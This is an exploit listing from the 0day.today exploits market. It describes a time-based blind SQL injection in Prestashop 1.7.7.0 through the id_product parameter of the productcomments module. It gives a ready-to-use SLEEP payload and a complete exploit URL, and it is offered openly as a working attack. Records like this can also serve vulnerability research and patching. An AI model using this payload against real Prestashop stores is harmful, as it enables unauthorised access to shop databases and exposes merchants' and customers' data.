[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Prestashop 1.7.7.0 - (id_product) Time Based Blind SQL Injection Vulnerability

Author
Jaimin Gondaliya
Risk
[
Security Risk High
]
0day-ID
0day-ID-35663
Category
web applications
Date add
11-01-2021
Platform
php
# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
# Exploit Author: Jaimin Gondaliya
# Vendor Homepage: https://www.prestashop.com
# Software Link: https://www.prestashop.com/en/download
# Version: Prestashop CMS - 1.7.7.0
# Tested on: Windows 10

Parameter: id_product

Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)

Exploit:
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt)

#  0day.today [2024-12-25]  #